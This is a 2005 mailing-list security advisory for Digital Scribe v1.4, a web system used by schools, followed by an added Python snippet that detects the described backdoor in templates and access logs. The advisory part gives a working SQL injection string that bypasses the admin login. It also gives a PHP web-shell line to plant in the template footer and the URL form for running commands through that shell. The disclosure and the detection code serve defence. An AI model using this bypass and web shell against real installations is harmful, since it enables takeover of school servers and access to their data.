Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

retrogod_at_aliceposta.it
Date: 09/15/05

    Date: 15 Sep 2005 12:51:23 -0000
    To: bugtraq@securityfocus.com
    
    
    Digital Scribe v1.4 Login Bypass / SQL injection / remote code execution

    software:

    site: http://www.digital-scribe.org/

    description: "Teachers have full control through a web-based interface. Designed
    for easy installation and even easier use, the Digital Scribe has been used in
    thousands of schools. No teacher or IT Personnel needs to know any computer
    languages in order to install and use this intuitive system."

    1) Login Bypass / SQL Injection ************************************************

    log in as admin by typing:

    login: " or isnull(1/0) /*
    password: [whatever]

    2) remote code execution *******************************************************
    now you can edit the template and leave a backdoor on the target system:
    at the end of the footer try this:

    <?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>

    then you can launch commands:

    http://[target]/[path_to_dscribe]/index.php?cmd=[some_command]

    rgod
    site: http://rgod.altervista.org
    email: retrogod at aliceposta it
    original advisory: http://rgod.altervista.org/dscribe14.html
    ********************************************************************************
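
For checking an installation for the footer backdoor described in section 2, the following is an added example (not part of the original advisory): it flags PHP blocks in a template that call code-execution functions and lists logged requests to index.php carrying the `cmd` parameter. The sample footer markup, the log lines and the `/dscribe/` path are constructed for illustration; the parameter name is whatever was planted, `cmd` being the one used above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# PHP calls that run OS commands or evaluate code; a page footer needs none of them.
EXEC_CALL = re.compile(r"\b(system|exec|passthru|shell_exec|popen|proc_open|eval)\s*\(", re.I)
# Request-supplied input, in the old ($HTTP_GET_VARS) and newer ($_GET ...) spellings.
USER_INPUT = re.compile(r"\$(HTTP_(GET|POST)_VARS|_(GET|POST|REQUEST|COOKIE))\b")
PHP_BLOCK = re.compile(r"<\?(?:php|=)?(.*?)(?:\?>|\Z)", re.S | re.I)
# Common/combined log format: client, two ids, [timestamp], "METHOD target PROTO".
LOG_REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) [^"]*"')

# Constructed sample data (assumed layout, not taken from a real installation).
SAMPLE_FOOTER = (
    '<div class="footer">Powered by Digital Scribe</div>\n'
    "<?php error_reporting(0); system($HTTP_GET_VARS[cmd]); ?>\n"
)
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Sep/2005:12:40:01 +0000] "GET /dscribe/index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [15/Sep/2005:12:41:13 +0000] "GET /dscribe/index.php?cmd=id HTTP/1.1" 200 5188',
]

def scan_template(text):
    """Return (line_number, reason) for each PHP block that calls an exec-style function."""
    findings = []
    for m in PHP_BLOCK.finditer(text):
        body = m.group(1)
        line = text.count("\n", 0, m.start()) + 1
        call = EXEC_CALL.search(body)
        if call:
            source = "fed from request input" if USER_INPUT.search(body) else "call in template"
            findings.append((line, f"{call.group(1)}() {source}"))
    return findings

def scan_access_log(lines, param="cmd"):
    """Return (client, value) for requests to index.php that carry `param`."""
    hits = []
    for entry in lines:
        m = LOG_REQ.match(entry)
        if not m:
            continue  # not a request line in the expected format
        url = urlsplit(m.group(2))
        values = parse_qs(url.query, keep_blank_values=True).get(param)
        if values and url.path.endswith("/index.php"):
            hits.append((m.group(1), values[0]))
    return hits
```

A clean template scan does not clear the host: the login bypass in section 1 gives admin access regardless, so review the stored template after any unexplained admin session.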

